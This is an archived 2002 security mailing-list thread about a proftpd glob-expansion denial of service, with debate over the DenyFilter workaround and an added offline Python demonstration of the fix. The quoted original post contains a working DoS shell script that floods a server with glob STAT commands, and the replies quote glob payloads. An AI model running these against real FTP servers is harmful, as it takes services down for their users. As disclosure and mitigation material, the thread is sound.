Re: [VulnWatch] proftpd <=1.2.7rc3 DoS
1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, nor does the
default proftpd install on Slackware 8.1.
3. The methods mentioned on the page you refer to do not work on later
proftpd versions (tested on 1.2.7rc3) because of limits set in the
ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
these proftpd versions don't even process that command.
I think I have done proper research on this issue before notifying anyone.
People should do more research before making any conclusions, it's far
On Tue, 10 Dec 2002, Kurt Seifried wrote:
> This is so old I can't even find any postings/articles I remember making on
> it. Here is one link from early last year:
> Check the documentation:
> DenyFilter \*.*/
> Problem solved.
> People should search Google before posting, it's far less embarrassing.
> Kurt Seifried, kurt@xxxxxxxxxxxx
> A15B BEE5 B391 B9AD B0EF
> AEB0 AD63 0B4E AD56 E574
> ----- Original Message -----
> From: "Rob klein Gunnewiek" <rmkleing@xxxxxxxxxx>
> To: <bugtraq@xxxxxxxxxxxxxxxxx>; <vulnwatch@xxxxxxxxxxxxx>
> Sent: Sunday, December 08, 2002 4:53 AM
> Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
> > Hello,
> > proftpd is vulnerable to denial of service similar to the list
> > */../*/../*/../*.
> > #!/bin/sh
> > #
> > # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> > # might work against many other FTP daemons
> > # consumes nearly all memory and a lot of CPU
> > #
> > # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> > #
> > # 7-dec-02 - detach - www.duho.org
> > #
> > # use: ./prodos.sh <host> <user> <pass>
> > # do this some more to make sure the system eventually dies
> > cnt=25
> > # start 25 ftp clients in the background; each one logs in and
> > # sends a single STAT with a glob the server then has to expand
> > while [ $cnt -gt 0 ] ; do
> > ftp -n << EOF&
> > o $1
> > quote user $2
> > quote pass $3
> > quote stat /*/*/*/*/*/*/*
> > quit
> > EOF
> > cnt=$((cnt-1))
> > done
> > # give the clients time to send their STAT, then kill them off;
> > # the glob expansion has already been handed to the server
> > sleep 2
> > killall -9 ftp
> > echo DONE!
> > #end
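Two things are argued over in this thread: how much work a glob like */../*/../* makes the server do, and what the DenyFilter \*.*/ that Kurt cites actually stops. The script below is an added example written for this page; it is not code from either poster or from the proftpd project. It assumes that DenyFilter is a regular expression tested against the argument string of each FTP command (as the proftpd documentation describes), that Python's glob module expands a pattern the same way a server-side glob would, and it uses a constructed temporary directory tree; the function names are mine.

```python
"""Glob-expansion blowup and the DenyFilter workaround, side by side.

Added example for the proftpd <=1.2.7rc3 DoS thread; not the poster's
code.  Everything here runs offline against a constructed temp tree.
"""
import glob
import os
import re
import tempfile

# The filter from the thread, as it would appear in proftpd.conf:
#     DenyFilter \*.*/
# proftpd treats it as a regex and rejects any command whose argument
# matches.  Read literally: a '*' followed, anywhere later, by a '/'.
DENY_FILTER = re.compile(r"\*.*/")


def deny_filter_rejects(argument: str) -> bool:
    """True if DenyFilter \\*.*/ would reject this command argument."""
    return DENY_FILTER.search(argument) is not None


def glob_growth(width: int, max_stars: int) -> list[int]:
    """How many paths '*', '*/../*', '*/../*/../*', ... expand to.

    Builds a constructed tree of `width` empty directories (nothing
    deeper) and returns one match count per pattern, for 1..max_stars
    '*' components joined by '/..'.  The tree never changes, but every
    '..' climbs back to the root, so the count is width ** k: the
    server does exponential work on a constant-size filesystem.
    """
    counts = []
    with tempfile.TemporaryDirectory() as root:
        for i in range(width):
            os.mkdir(os.path.join(root, f"d{i}"))
        for k in range(1, max_stars + 1):
            pattern = "/../".join(["*"] * k)      # e.g. */../*/../*
            matches = glob.glob(os.path.join(root, pattern))
            counts.append(len(matches))
    return counts


def screen_commands(commands: list[str]) -> dict[str, bool]:
    """Apply the DenyFilter to a batch of (command, argument) lines.

    Returns {line: rejected}.  Lines without an argument pass through,
    since there is nothing for the filter to match.
    """
    verdicts = {}
    for line in commands:
        parts = line.split(None, 1)
        argument = parts[1] if len(parts) > 1 else ""
        verdicts[line] = deny_filter_rejects(argument)
    return verdicts


if __name__ == "__main__":
    # Constructed sample: the two globs from the thread plus ordinary use.
    sample = [
        "STAT /*/*/*/*/*/*/*",
        "LIST */../*/../*/../*",
        "LIST .*./*?/.*./*?/.*./",
        "LIST /pub/*.txt",
        "CWD /pub/incoming",
        "PWD",
    ]
    for line, rejected in screen_commands(sample).items():
        print(f"{'REJECT' if rejected else 'allow '}  {line}")

    width, stars = 8, 4
    for k, n in enumerate(glob_growth(width, stars), start=1):
        print(f"{'/../'.join(['*'] * k):<22} -> {n:>6} paths "
              f"(= {width}**{k}, tree has {width} dirs)")
```

Note what the filter does and does not do: it stops every glob in the thread, including the ls .*./*?/.*./ variant, because each has a '*' with a '/' somewhere after it, while a single-component glob such as /pub/*.txt still works. The growth figures also explain Rob's "Out of memory during globbing" line: a pattern whose components back out with .. is not bounded by the size of the tree, so a limit on the depth of /*/*/*/* alone does not cover it.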